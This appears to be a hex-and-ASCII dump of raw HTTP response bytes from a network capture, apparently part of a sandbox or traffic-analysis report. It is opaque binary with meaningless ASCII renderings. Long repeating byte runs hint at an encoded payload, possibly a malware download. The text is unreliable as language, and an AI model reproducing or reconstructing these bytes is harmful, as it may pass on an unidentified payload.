                                                2021-10-13 18:36:05 UTC541INData Raw: 44 fe d3 65 50 77 fe 2e 2d a6 6a f2 fc 7b 6a a9 ce 5f fb c1 1d 1e 10 39 87 73 06 81 40 8a 7d 2a 09 35 1e 4c 14 bf 48 56 2b 9c 26 bb 31 6f 83 49 39 0a 77 7a 4d 8d fe 9f 19 c8 7f a3 a2 e6 40 9d 1b 46 e0 15 c1 b9 cc 0b 7f 80 75 57 6a 05 f6 be 4a 1e ff f2 0a f2 45 3e 66 be b0 91 80 92 b6 0b e0 54 79 02 92 35 c2 67 a7 8a 47 2b 24 7a 92 d8 73 a4 ae d9 f7 b6 f6 c5 f1 db 17 0f fc 88 7d 58 ce 0f 63 b7 6e e5 9e 05 5e ce 39 42 da fb 15 a2 96 60 97 c9 93 6c 5b bb 99 43 53 f8 c1 31 5e 23 51 74 04 7d a8 32 b8 e9 af 65 f6 7b cb 8e 83 e6 3c ba 23 90 ed 90 48 ee e5 1b f9 c6 cb 04 5c 34 6b 20 19 9b 9a bd 4a 8e ee bc 21 c3 60 20 e4 20 df 38 8f e9 93 32 7d 97 77 1a db 27 b8 1e 4b c7 53 b0 90 b8 8e a3 81 e4 9c 66 d7 2f d4 29 43 f6 e4 4e fd 9e 9b 30 34 56 45 b9 02 9f fd c6 eb
                                                Data Ascii: DePw.-j{j_9s@}*5LHV+&1oI9wzM@FuWjJE>fTy5gG+$zs}Xcn^9B`l[CS1^#Qt}2e{<#H\4k J!` 82}w'KSf/)CN04VE
                                                2021-10-13 18:36:05 UTC545INData Raw: 67 ab 57 d8 6f aa c6 40 78 07 0e 6e 0a 4f 49 1b 30 74 a4 5d 48 59 39 80 9c 43 7e 83 eb bd 11 e0 04 b4 b6 7d ea 66 5f 6b 42 7a e7 a8 a2 13 6d e4 01 05 09 77 3b 3b 54 6c be be df 5f ef b2 a8 31 64 a2 9b 03 da 5e 84 23 c1 f3 bf 5b 3f 31 9c 2a ef ad 9b 74 f6 53 1a dd 2f da e0 1d 10 8f f1 29 19 bc 4e 5d cc fd 79 7f 83 9f 46 a2 4d 41 86 df a8 46 25 3d 2c ef 29 a7 8f 69 09 d9 9b fc 90 bc a4 e6 db c5 0c 5f 74 af 44 02 2f ff f6 8c 13 4c 47 d4 94 cf a8 6b 7b 1f 64 a5 aa 0b de 37 38 a6 16 98 0c 78 04 b3 96 02 39 a3 74 c4 82 01 0e df 75 df 0d cd 2e 2b 7c 67 13 90 60 62 68 6d 2a 7b 56 b3 c4 ae 77 fb 19 7b 7e 15 26 92 e1 14 0e e0 72 ed 37 0d a0 44 64 83 40 12 70 69 84 6b 3a c5 01 83 45 8f 18 d9 63 9a f7 1d 01 7e 28 f7 3c 3b ab 4e 7d de 99 5e d8 50 cd c3 d5 15 cc 76 b4
                                                Data Ascii: gWo@xnOI0t]HY9C~}f_kBzmw;;Tl_1d^#[?1*tS/)N]yFMAF%=,)i_tD/LGk{d78x9tu.+|g`bhm*{Vw{~&r7Dd@pik:Ec~(<;N}^Pv
                                                2021-10-13 18:36:05 UTC549INData Raw: 31 13 9e 3b 39 8a f8 b2 92 09 ca ad 3c 72 b9 93 11 3a 86 0c 3d d7 1c 64 b1 7f 7e be 33 8f 9c 52 7e 47 94 2b f1 b3 73 5d 8a 3e 83 6a b7 63 e8 59 f6 dc 8e f3 d0 fb 24 c7 24 0d 3e cc 79 86 d5 9f 3d 71 99 d5 ba 27 21 e1 96 a5 d3 2e 0a b9 77 b2 03 5a a9 2d 6f 02 98 aa 9e 50 60 04 05 55 3d 4e dc 5c 81 b0 c2 be 7c 94 eb 78 4b 89 21 db c7 6c 09 ab 3a 8a ec 59 e5 ae 67 65 31 bc d4 e5 ea 64 65 5b 79 b6 96 86 a1 72 33 d4 3e f5 a8 d4 90 14 28 e5 50 fc 75 ad 50 3f 26 72 2e 4e 83 0e e5 76 d4 2a 13 5d 28 9b 11 06 16 7d d5 02 94 76 29 80 68 f8 74 15 04 c4 65 de 15 e1 35 a4 85 a6 a9 47 80 86 25 37 5d 3e 10 d4 6f 7f 62 1e 46 e5 b9 65 3f 99 89 04 ba 18 3f d1 1e 65 d7 a3 0d 5b 37 35 d0 d1 ab c3 0e e3 b6 e2 e6 9b b1 22 68 93 d5 08 dd 47 8d 73 11 1b 65 67 d8 45 a3 67 1a b8 24
                                                Data Ascii: 1;9<r:=d~3R~G+s]>jcY$$>y=q'!.wZ-oP`U=N\|xK!l:Yge1de[yr3>(PuP?&r.Nv*](}v)hte5G%7]>obFe??e[75"hGsegEg$
                                                2021-10-13 18:36:05 UTC553INData Raw: 64 8a c0 38 fd 49 8a c1 08 f7 7e eb 67 29 5c 28 89 d3 dd da 98 b0 32 69 ba 12 19 6e f7 38 30 50 1b 81 cb b8 37 33 5b 80 94 16 cb 3b 73 e4 65 79 b9 96 e9 bb 2d 1b 3d 35 27 ca fe 9a a2 f3 47 0f 13 1d 5a 5b 9c 91 fc 2a 8b 70 6d 7d 40 3d c7 38 d0 a3 a4 48 b2 cf b9 6c b7 27 8b 29 e0 db 36 0f 83 0f 94 1f 38 1c 9b d4 8d 25 36 e5 17 9d da e5 21 1a 52 67 4f f8 a7 82 87 9a 95 60 2b 55 07 2c d4 57 98 b2 95 97 a8 4d cf 4c 28 e1 1f 71 97 49 24 bd eb c8 fd 6f 1e a4 21 a1 37 c6 27 01 e0 cd c7 3b 98 02 55 bf a2 d4 0f a1 cb ee db 87 9d a2 43 85 70 9f 46 12 ff eb 91 a5 28 90 ac 90 17 9c b0 10 f4 70 d6 cb 8f a7 36 2f c4 03 a1 31 36 a8 02 2f 3c e3 63 3b 6d 08 5c 2f ce b3 38 65 f6 d2 fa 41 40 22 37 8c a3 f7 79 b9 8e 0e eb 63 de 25 c1 b6 c0 16 82 9c cc b7 41 36 83 99 58 77 90
                                                Data Ascii: d8I~g)\(2in80P73[;sey-=5'GZ[*pm}@=8Hl')68%6!RgO`+U,WML(qI$o!7';UCpF(p6/16/<c;m\/8eA@"7yc%A6Xw
                                                2021-10-13 18:36:05 UTC558INData Raw: 8c 53 b0 07 50 fc a6 0f 5a ad ad 58 2d b4 27 f3 26 91 f2 9e 7f da 81 96 71 20 83 fe 70 d3 79 fc 45 6d 2e cd fa f9 a5 2b d8 42 fb f3 5b 28 9b a7 41 e5 84 8f e0 07 7a e1 d2 44 79 68 68 90 8a e2 ef 3e 59 a6 c8 9c 02 0c e3 b6 b7 55 15 60 d1 0d d1 0c ec 74 9c 98 f6 38 b6 3e f8 cc 5c d9 7d f4 cb 5b 51 ef 08 c4 70 0f 45 d5 16 c3 ee 0e b8 36 38 f5 8c 15 f3 c5 d6 f8 82 8b fc 37 b6 ee 21 d3 6a 17 ae ea ce 29 2e 02 04 b5 c0 ab af da 0b 19 c4 ba b5 75 c2 d3 d9 8d 8e a0 b8 7e 3a 9b d3 f1 b0 c3 2c 67 12 42 79 0b 13 be 6f 0f b4 69 82 aa 22 2e 94 49 07 16 1f 4e 2c e4 c3 7e 75 96 ca 67 de 4b d7 2b 1f 49 78 13 e3 b4 c4 a1 26 5e 62 58 65 50 56 75 ff 06 44 7e 48 4e ce 37 49 5e 04 b6 69 6a be 8a b6 67 93 a8 a5 24 41 be b1 c2 75 30 59 28 b4 8c bd 52 81 4c 50 71 08 9b 35 05 3b
                                                Data Ascii: SPZX-'&q pyEm.+B[(AzDyhh>YU`t8>\}[QpE687!j).u~:,gByoi".IN,~ugK+Ix&^bXePVuD~HN7I^ijg$Au0Y(RLPq5;
                                                2021-10-13 18:36:05 UTC561INData Raw: 2d 50 59 b0 38 b3 98 37 3c e0 fb 54 26 ba 40 aa d8 d7 00 d9 c6 e1 38 12 39 52 b7 63 98 b2 6b 18 dc a6 91 45 18 71 91 76 01 4a ff ef 67 73 12 3b de 19 58 46 7d 78 3c 69 80 05 36 9b b0 be bb 5d 6a 25 1e 23 3c a1 9b c1 27 96 f1 39 79 97 bd 52 64 98 08 f0 8d e3 49 08 27 dd ef 1c d5 ef 4f c8 cc c8 7e a7 23 b2 2e b1 f2 28 66 f6 a9 52 48 c5 06 61 df 48 e9 c1 0c e1 c8 2c 89 19 72 3d 43 2d 1e bb d7 a7 e5 e1 55 ea c1 33 f2 01 1c b1 49 b4 18 c4 27 1a c9 d3 3d 0a fb 04 fe 64 12 a9 88 71 d6 95 9a 73 ce ed 38 ed 78 95 e0 e6 66 23 5f 58 62 83 93 41 e8 0c 1d 4c 4b f9 c6 ce 32 cc c5 61 f8 e6 9e ad 77 b8 87 f4 8e 30 cf 2f 22 f8 09 c8 36 5a 01 7a ea 59 76 f7 bd 67 e5 32 93 4a b4 49 25 c2 0e 54 37 fd 0e 55 12 b1 3d f4 86 d1 dc bc dc ca 36 09 bd b0 f4 1e 5b c4 5d b9 29 cf 8f
                                                Data Ascii: -PY87<T&@89RckEqvJgs;XF}x<i6]j%#<'9yRdI'O~#.(fRHaH,r=C-U3I'=dqs8xf#_XbALK2aw0/"6ZzYvg2JI%T7U=6[])
                                                2021-10-13 18:36:05 UTC565INData Raw: ee cc 7a 2f 77 b8 5e 71 8d 5a 55 db 95 6c 11 b0 af 27 75 85 51 c6 74 15 b9 c1 d1 e6 3b 14 35 07 8e d3 94 f0 dc 08 1f 48 b2 a7 0c 29 66 71 91 63 ef 5a f1 d9 1d d8 ab 85 d7 18 90 72 e8 c4 c5 48 2a 7f 58 cd 60 fe 47 d5 76 d1 4a 25 f1 d9 6a ee 66 d4 97 e9 21 cc f2 34 06 91 e5 2d 8e 52 bd 4e b2 49 b4 4d c1 5d 66 8c 22 5c ea b8 c1 2d 89 cd 74 e9 40 15 05 3e 0a 8f ce d3 25 cc e3 08 8b a4 60 f4 47 a9 89 a0 12 a2 19 ee 27 93 97 c7 76 8e 4b df 74 b8 ef d0 e2 b2 2b e6 aa 1e 35 f3 b0 50 c3 59 24 2e 7f 30 70 e0 ab d7 75 1f ac 24 55 2e 09 64 f3 bb 4d b9 4a 33 fb e4 d4 89 c7 1c 3a 66 82 c0 d2 fc 4b aa 0c b1 89 eb 29 fb ce e7 41 d2 e7 26 78 b3 db 00 96 7c 9f e1 53 3d ae 3a 3e 0a f8 30 5d 4a 23 c1 41 bb 66 da b2 15 1c 68 a8 35 95 fe 7b 0b 04 9d ec 92 77 54 bf 49 a2 12 a4
                                                Data Ascii: z/w^qZUl'uQt;5H)fqcZrH*X`GvJ%jf!4-RNIM]f"\-t@>%`G'vKt+5PY$.0pu$U.dMJ3:fK)A&x|S=:>0]J#Afh5{wTI
                                                2021-10-13 18:36:05 UTC569INData Raw: 69 32 3e 2f b6 1f 90 00 c5 68 c0 fc 24 70 d3 2d b2 13 73 7a eb 0f 69 2d b2 1c 09 7b 6d 3f dd 3c 56 fb a1 ad e6 cf 37 be 8e 68 c0 fa 1f fc 24 3c 56 f3 8e 75 5f 43 e6 9d bf 65 38 1f 90 05 51 7b 6d 69 42 44 69 23 99 95 ac 0c e2 91 a2 6b 47 83 80 dc d7 6b 47 91 a2 6b 47 9e 41 85 85 ec fd d5 46 1d 8b f5 93 87 8a 65 38 23 99 db 54 e1 63 52 8b d7 4b e0 e0 99 b5 98 33 a4 50 f4 10 99 b5 8d 99 d4 c3 49 f5 9b ba fc 24 7d 72 bc 8a 78 e6 9d bf 57 17 7b 6d 35 c5 7e f4 74 dc a4 50 f4 10 99 b5 91 a2 1f 90 28 26 58 99 d4 c3 7e f4 63 33 a5 d2 d1 3c 32 3e 3f dd 0e e7 78 e6 96 2e 55 12 95 ac 10 ec 98 33 b5 f9 c8 a7 d0 ba fc 24 7d 72 bc 8a 7f 77 0b 60 e1 63 35 c5 66 bb 66 bb 63 33 ae 68 b5 f9 cf 37 cc b0 19 81 1d 8b c7 24 1f 90 49 f5 e1 63 75 5f 29 a8 2f b6 13 73 0e e7 72 d8
                                                Data Ascii: i2>/h$p-szi-{m?<V7h$<Vu_Ce8Q{miBDi#kGkGkGAFe8#TcRK3PI$}rxW{m5~tP(&X~c3<2>?x.U3$}rw`c5ffc3h7$Icu_)/sr
                                                2021-10-13 18:36:05 UTC573INData Raw: 69 42 05 51 61 2f c4 9d de db 02 ca bb 07 7f 77 17 7d 57 17 55 12 d1 3c 33 c0 e3 67 44 69 36 47 d0 ba ea f8 6e ce db 54 e6 ef a4 50 af ea 8b 94 0c e2 cd 33 e0 e0 85 85 f5 93 de db 20 12 d1 3c 30 39 a1 c9 09 5b 54 8f f3 8e 7a eb 12 f1 fb a1 a8 5a e8 f4 30 39 a9 dc b9 02 a3 cd 47 f0 75 5f 4f 03 3a 51 66 bb 68 c0 f0 07 76 e1 06 d4 af ea 91 a2 23 99 c2 98 13 73 2d b2 1d 8b f8 1a 62 b1 9d bf 74 dc a1 c9 66 bb 3a 51 21 95 df 5e 82 fe 00 c5 3f dd 3c 56 e4 ea 81 7c 84 03 6c c9 46 6e ba 85 eb 7b 04 cf 17 7d 5b 20 61 2f 93 a7 ff ab c1 16 9f c4 ed 80 80 f9 e8 f4 30 39 a8 5a f1 89 af ea 8c 16 94 29 c9 29 c1 16 88 0d 04 cf 41 e2 c5 1f e4 ea 8a 11 0b 60 da d2 d1 3c 39 ce d6 c8 87 8a 65 38 23 99 db 54 af ea 9c 3d b4 76 94 29 c7 24 5f 2a 1f 90 53 0d 40 5f 20 12 d8 cd 4b
                                                Data Ascii: iBQa/w}WU<3gDi6GnTP3 <09[TzZ09Gu_O:Qfhv#s-btf:Q!^?<V|lFn{}[ a/09Z))A`<9e8#T=v)$_*S@_ K
                                                2021-10-13 18:36:05 UTC577INData Raw: 70 dc e5 6b 76 0f 58 7f 46 a3 fc e1 52 27 92 81 4d 74 ed 03 7d 18 ce d7 7a a2 7a aa 6f 78 d7 6b 76 e6 df a1 f9 7a db 8a 21 50 b6 c6 92 81 4c e0 d0 39 fe 53 3d ba b5 a3 fd e7 41 db 64 96 1e 15 78 e6 ef 48 73 5b 60 ac 5c 5c 9c ca 94 f7 a7 01 77 d9 70 66 84 9f fb 35 fa 64 89 fc 1b dc e8 a6 6a fd 99 a9 e3 6a fb a0 78 3a 6f 9f fa dc e9 ed be ef ba a7 ea 27 9e f1 b4 d5 7b f4 2d 20 2f 3e 67 bc b7 89 b2 19 bc d2 82 b2 4f 3c 6b 74 e1 78 db 5d 19 7e c8 57 2b 4b c6 7e c8 75 63 8b a8 fa 23 0f 55 9d 83 03 70 b6 47 a3 f1 c7 18 e1 5f 25 a5 29 93 56 af 37 f1 5e 9c fa 24 a1 f2 80 c2 fb 98 db 6d 88 34 dc ef 27 9b 25 a6 ce 8d 0e df cd 0b ef bc 01 70 54 b7 7d 4a 08 e1 18 c7 53 35 b6 43 89 b7 95 94 4e b9 61 17 22 2f ed b8 d7 73 09 63 7c c8 89 b8 cf 00 e9 40 b5 cf 0c d4 cf 02
                                                Data Ascii: pkvXFR'Mt}zzoxkvz!PL9S=AdxHs[`\\wpf5djjx:o'{- />gO<ktx]~W+K~uc#UpG_%)V7^$m4'%pT}JS5CNa"/sc|@
                                                2021-10-13 18:36:05 UTC581INData Raw: ad dd e1 58 2d 89 3f e6 43 dd f1 b2 d6 f3 2e 0f f1 b2 0a e6 89 b4 2e 0f 3d e3 37 f1 c5 24 54 b4 32 05 11 55 2e 0f 51 33 f0 3c 4a 4c 6c f2 06 ee fa 25 75 65 e7 4b 2a 10 24 26 e1 59 a3 f7 28 1c a1 f3 2e 0e 7f 4d 6f 6a 4c 46 ee 38 34 78 96 14 9d 85 e5 56 cc 8a 41 d8 85 bf 51 32 06 ee 32 04 e7 4b da e8 ec c7 34 78 ee 38 4c 45 13 4a 87 b3 1c 30 d9 76 39 f7 48 4a bf 28 e6 d6 70 ea 48 4a df 67 9d 86 90 19 11 57 9f fd 26 18 87 b3 84 3a 39 f7 f8 23 c1 2f e6 d6 80 c0 d3 78 de e2 d5 7f 5f 13 53 34 5a a7 c7 1d 83 b9 02 f2 f4 28 d6 f0 ef bc 6a fc fc 1c d9 77 ac 5b e0 d8 75 67 8d a1 61 17 dd 61 b7 c6 32 06 5c 9b 3a 69 3a 69 32 06 bc b2 12 c9 71 6d 1c 31 f3 b6 3b eb 43 de eb 43 ce 8d b9 3a 49 cd 23 a1 c1 2e 34 75 a5 e5 84 34 99 82 31 8c a4 67 97 86 aa 69 d8 fa 8d ae e2
                                                Data Ascii: X-?C..=7$T2U.Q3<JLl%ueK*$&Y(.MojLF84xVAQ22K4x8LEJ0v9HJ(pHJgW&:9#/x_S4Z(jw[ugaa2\:i:i2qm1;CC:I#.4u41gi
                                                2021-10-13 18:36:05 UTC585INData Raw: 1d 13 73 5b bb 87 8a 10 77 08 d9 4e 1a 5a 9e 40 c4 db 54 8e 80 d5 46 6f cb 0e e7 70 48 7d 72 d9 d5 b8 80 f8 80 15 78 e7 eb 99 b5 f8 80 2f b6 7a 71 95 ac 62 2b 03 4c 7d e8 6e ce b4 ec 7b 6d 4d 65 48 73 5b ba d9 4f 02 50 ca ab e0 7a d7 4b fb 3b f9 9c 3c cc a4 50 87 10 ec fd a7 4e 6f 50 87 13 ad e6 ee 9b 70 d3 40 c6 14 f5 92 bc 2e 34 43 7f e3 67 3c cf 4f 03 4d 66 db 54 8e 82 ae 68 c1 8f dd 59 1a 9d 8f 9d be 17 59 1b 87 13 63 33 c1 8f 9f c4 9c a5 20 12 f0 9f 26 21 94 b1 39 ce b4 ee c6 a2 4a ef 34 42 65 a0 d8 cd 32 a6 db 54 8e 83 fc 24 1d 13 1d 8b 95 34 1e 0d 64 2e 78 e6 ee 9a 0e e7 70 4b d0 ba 84 9b ae 68 c1 8e 11 6e cf af ea f8 1b 11 98 33 c1 81 96 2e 35 52 55 12 f1 89 8f 9d be 19 43 e6 ee 95 18 ff aa c9 8b 94 29 a8 5a 9e 40 c8 21 95 ad 71 2f b6 7a 7c 9e 41
                                                Data Ascii: s[wNZ@TFopH}rx/zqb+L}n{mMeHs[OPzK;<PNoPp@.4Cg<OMfThYYc3 &!9J4Be2T$4d.xpKhn3.5RUC)Z@!q/z|A
                                                2021-10-13 18:36:05 UTC590INData Raw: 6d 90 ea 21 4f db 8f 53 c0 5b ef 53 c4 55 de 10 ec fd e6 c6 ba 85 c5 3a 6d 4c 3c 75 cf 37 ca ab e1 63 33 c0 93 a7 97 3c 57 17 3d 55 12 f1 c9 a4 50 86 48 fe 28 e6 64 a5 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 cb 2c 2f b6 7b 6d 4c 7c f0 07 56 94 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8
                                                Data Ascii: m!OS[SU:mL<u7c3<W=UPH(d,/{mL|V)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)ZAl)
                                                2021-10-13 18:36:05 UTC593INData Raw: 40 d4 c3 5b aa 3e e2 1a fa fa 54 67 25 cc 3b d3 00 4f 87 9f 4f 03 0d ef e0 58 66 45 0e b9 ea ec af 61 2f f7 12 75 4a fc 24 5d af 9e f9 63 cd d6 b9 ea e8 a6 de db 15 f2 88 18 74 dc 96 a4 3c ee fd 58 7c 74 34 4e d3 ca ab a0 cc 34 57 9c 3d 99 3f 4d 47 0f 97 54 18 17 75 0d ee 02 8b 1e 89 9a b3 f4 51 82 82 46 91 5c 46 c4 75 5b 72 53 0d 24 96 aa 4b 71 55 53 87 0a 65 c7 da 24 39 26 21 d4 97 29 a5 59 1b c7 ae ec 45 53 58 12 0e 18 07 4a 9f c4 dc 5d bd ad 5e ea 75 eb 2e bf ee fc cc a4 b8 80 b8 f9 b8 95 27 17 38 c1 e9 88 e8 1a ec fd e7 fb 39 76 5d 70 58 66 44 97 aa b6 7b 2c a5 7a 4a cb 7b e0 1f 6e 28 2e dc d7 0a 57 bf a9 1c 5c 28 d9 b0 97 80 11 6e 8f f5 4f bb c7 71 d8 32 c0 70 71 bd 0c a3 93 7b d5 66 32 5a ae 97 d5 46 2f de 14 9d ea 38 7f 88 f2 09 ed 68 c0 d2 e1 57
                                                Data Ascii: @[>Tg%;OOXfEa/uJ$]ct<X|t4N4W=?MGTuQF\Fu[rS$KqUSe$9&!)YESXJ]^u.'89v]pXfD{,zJ{n(.W\(nOq2pq{f2ZF/8hW
                                                2021-10-13 18:36:05 UTC597INData Raw: 36 b8 97 b4 9e 41 a3 9d 93 cf 37 8b c4 85 ed 78 a3 44 a9 ef 8c 63 b8 58 12 0d 30 b0 94 a2 1c 5f 79 88 c9 aa b2 f9 c9 e9 fd a6 51 ca f6 f0 8c 48 2c c3 4f fc 74 2c 7a 14 a5 2e 41 1d 7f 22 e8 0c 97 4e 24 b9 a7 72 7d 9e 3c db a4 db 5c e6 64 e1 35 29 6c 4a 9b 31 ee c2 13 b0 30 dc 5c f8 44 36 b8 c5 95 46 85 7a 15 97 87 63 f0 f8 e4 15 a0 ae 68 81 3a f1 9c b6 af af 67 3d 99 fa 07 3e 4a fe 4c 25 c7 7e 34 71 54 70 96 e8 f0 73 9a bd f3 71 a8 05 b9 c4 16 fa 5e ea 24 a6 bd 41 6f 50 ec f5 f9 63 cc a8 dc 3f 8b c4 6d 09 d0 ea aa 86 5d ae 3a a9 89 02 26 74 55 f2 59 90 c8 e2 6c fe 5c 63 b6 af af 61 2f b6 78 7b 85 43 6d bc df d5 89 04 9f 10 a9 51 9f b2 06 d4 c3 1a ff 2a 22 62 b1 1f ed 03 bc cf be 71 aa 46 f4 f8 4c 2c ec fe 1c 49 7e 00 80 72 88 5d 65 b3 00 80 72 d8 cd 03 4c
                                                Data Ascii: 6A7xDcX0_yQH,Ot,z.A"N$r}<\d5)lJ10\D6Fzch:g=>JL%~4qTpsq^$AoPc?m]:&tUYl\ca/x{CmQ*"bqFL,I~r]erL
                                                2021-10-13 18:36:05 UTC601INData Raw: e6 85 85 85 85 8a a8 b6 f0 52 4b 71 96 73 a2 a0 b9 fc db 32 d7 88 0d 24 22 ff c3 0a 54 eb 22 4e db 94 1a 04 8e 93 5f 2f 49 d5 cf 53 3d 27 c7 24 5d 1b 67 55 47 30 0a 31 30 6c c9 69 cf f4 4d a6 0c b9 e9 9d 40 a1 36 dd b0 ae 97 4e 87 e2 0d 65 38 4c 7e 4e 79 2d 3f dd 18 c1 a2 23 89 06 b0 34 1b dc 17 4e 7e 0b 68 96 c6 61 a4 80 72 27 5c a8 7d 9a c4 d8 46 91 5d 22 10 04 33 85 08 21 c0 18 00 3a ae 22 ff 57 52 00 3d 8d 14 d5 cf 53 3d 27 c7 24 5d 1b 2b c5 4a b7 cd cc 4f 08 9a d0 46 2b 26 dd 1c 80 23 12 09 16 73 93 94 7a 13 b7 7d 9e ca fe e8 7f b4 2b f4 49 ae 36 18 14 1e f2 f3 8e 08 30 fa e0 1f 96 cf df 5e a7 d7 49 4f fb e4 67 3d 99 8b af 82 ee 8b f0 5e fe 72 18 cc 6f 25 61 aa 11 91 5d 2c 8b 7c 36 cc 48 26 aa a1 36 4f cd db 16 29 23 61 6a 49 0a e5 30 b3 08 9c b6 5a
                                                Data Ascii: RKqs2$"T"N_/IS='$]gUG010liM@6Ne8L~Ny-?#4N~har'\}F]"3!:"WR=S='$]+JOF+&#sz}+I60^IOg=^ro%a],|6H&6O)#ajI0Z
                                                2021-10-13 18:36:05 UTC605INData Raw: 2b 1f 90 4a 77 0e eb 5f 7e 7d 7a cf 73 d3 59 4a 88 05 da 11 e5 6d fe 28 4c 7c 9a e0 6b b7 3a d2 ec 6d 8f c7 7d 76 c5 4b 71 71 51 83 84 27 f7 11 4a 73 d3 59 4a 88 05 da d3 f3 8e 71 55 78 1e c9 aa 9e ca 68 3f 22 5d 0a 35 14 7e 36 cc 73 a5 2d f8 1b 6e 1f 1b 44 e2 ef f0 07 48 0b e0 70 10 b7 a0 46 6e ce 35 57 e8 e4 61 ec 76 1e f2 f2 d2 57 d4 48 a1 fa 56 80 b2 f9 ca ab e1 63 b7 6c 36 57 9c fe a3 ef fa 1e 19 fa 9c 15 0d 65 24 67 bd d4 48 81 f7 ce e6 2f 3d 1b 86 08 d9 db c5 e0 e8 7f 77 25 b3 58 23 59 90 e3 3c 08 86 3c 05 ae 70 58 5f a1 31 af 61 3f 9b 31 73 56 1f 80 bf 9a c8 2c d5 cd 64 e0 b3 34 c9 ea f8 1a 04 4f 91 5d 35 4e 42 64 b6 7b e9 e4 15 68 4b f3 fa cd b7 fe 68 4d 3c 0d 3b cb 5d ac 9c c3 e6 46 86 18 bc 07 55 f0 c6 74 57 cf bc 78 6d 1a 57 17 79 aa 03 a9 57
                                                Data Ascii: +Jw_~}zsYJm(L|k:m}vKqqQ'JsYJqUxh?"]5~6s-nDHpFn5WavWHVcl6We$gH/=w%X#Y<<pX_1a?1sV,d4O]5NBd{hKhM<;]FUtWxmWyW
                                                2021-10-13 18:36:05 UTC609INData Raw: fa 46 37 90 e0 d3 be 71 aa c8 4f c0 18 30 b2 8e 4e 0a 22 e8 b7 7c 18 39 45 17 28 ab c1 9f a0 76 1e 69 42 25 83 7c 98 66 7b 5e 7f fc d6 43 1f 1b d1 6a 97 b1 85 69 c9 7c 60 6f 0b 3e 00 9c c2 67 1d 5d cc 4f fc b5 e2 0d 65 79 63 8f 3c 57 a5 19 0a dd 33 90 24 38 08 54 8f 95 88 49 33 c4 b9 76 68 90 df a1 36 a9 34 98 b8 71 de 23 5d a6 03 1f 53 09 1e 86 c8 2c ec a0 a3 46 35 9b e5 9b ff 21 7e 1f 6f af ca 49 1c ca 54 70 f4 a0 ae 68 c0 93 a5 68 2c 6a 49 f5 d2 a2 27 cb 3e d3 25 c7 7d 28 e6 dc d6 3f 98 f5 40 2a 64 f5 9b cf c8 58 b2 ce 5d 7d 9e 14 7e f8 4d 00 fd 2d 4a 32 b5 2a a1 25 d3 cc e0 10 a9 57 1b d1 c3 22 9c c1 53 86 db df ae 25 13 a8 69 04 ff d7 bd 89 c1 e5 e7 4a 02 12 ca bf 43 19 91 29 50 c3 91 7a 60 b8 d2 40 4f 88 f1 cc 3b d3 b6 3e 9c 1d 02 ae 58 66 df 5e e6
                                                Data Ascii: F7qO0N"|9E(viB%|f{^Cji|`o>g]Oeyc<W3$8TI3vh64q#]S,F5!~oITphh,jI'>%}(?@*dX]}~M-J2*%W"S%iJC)Pz`@O;>Xf^
                                                2021-10-13 18:36:05 UTC613INData Raw: 1a 04 cf 77 74 bc 8a 50 8b b0 19 ef e1 17 0e 8e 68 b2 17 2d e6 e4 ed 80 b8 8d c9 e9 fd d2 d1 59 6f 23 f0 74 ae 0d 35 91 a9 dc 96 37 4e 81 3d c2 ac 9c c3 e5 93 a7 d5 46 2f ae fc 24 5d 3c d6 c8 e6 f6 6d 4c 3d c0 fb a1 89 b6 63 33 80 c1 ea f8 5a a5 56 94 69 79 f8 1a 44 52 07 56 d4 f8 92 25 de e0 9c 3d 98 23 95 ac 63 33 c4 9d fe 25 a0 46 2f bb 37 ca ab e1 63 33 c0 93 a7 d7 0a d0 ea f8 1a 04 cf 37 ca ab e1 63 33 c0 93 a7 96 23 bd 78 95 c5 53 69 23 fc 56 fc 70 87 81 7c b1 f8 d6 c8 e7 48 6b 47 b0 55 ee 02 8a 2a ae 68 80 c2 08 d9 0f 52 07 56 d4 f8 92 25 de e0 9c 3d 98 23 95 ac 63 33 e4 ea b9 0e 2b ad e6 ef 84 03 4c 7c f0 07 56 94 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 68 cc 7c 30 b2 06 a7 be c2 cc b5 f9 dd 4c a4 50 c7 31 e3 67 7c e7 05 51 49 e3 f3
                                                Data Ascii: wtPh-Yo#t57N=F/$]<mL=c3ZViyDRV%=#c3%F/7c37c3#xSi#Vp|HkGU*hRV%=#c3+L|V)ZAl)ZAlh|0LP1g|QI
                                                2021-10-13 18:36:05 UTC625INData Raw: 80 f9 9c 31 bb 47 10 8c 16 fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 0b bf a7 d7 0b 80 dd 99 3e 5a 9e 41 e2 e5 6c c9 21 95 ec 22 bd 4a 77 64 b6 7b 6d 4c bc 8a 11 6e ce b5 f9 9c 3d d8 cd 33 c1 16 ba 5a 3e 5a de 04 59 1b c6 7d fb a1 c9 0c 3c bf e9 72 fc 60 2f b6 7b 48 af 03 b4 72 fc 60 2f 96 d1 3c dd 5d 01 0c 69 ba 81 58 dd da 1e 9d 7c 0f 96 d2 09 b3 f1 fa 1e 0d 24 94 2d 9f 47 30 b2 b1 b2 8a fa e0 1f ce 6f b9 c1 16 ba 5a ea 90 30 b0 09 02 93 fd 66 88 0d 24 94 2d b7 01 68 49 91 92 da b6 7b 2d 6d 21 fd f3 4e b2 9e ca fe 28 4a 18 90 62 dc b8 f2 4a 05 25 ed c2 ea 99 e3 67 58 ed e1 27 ce da a0 00 b7 8a 62 f3 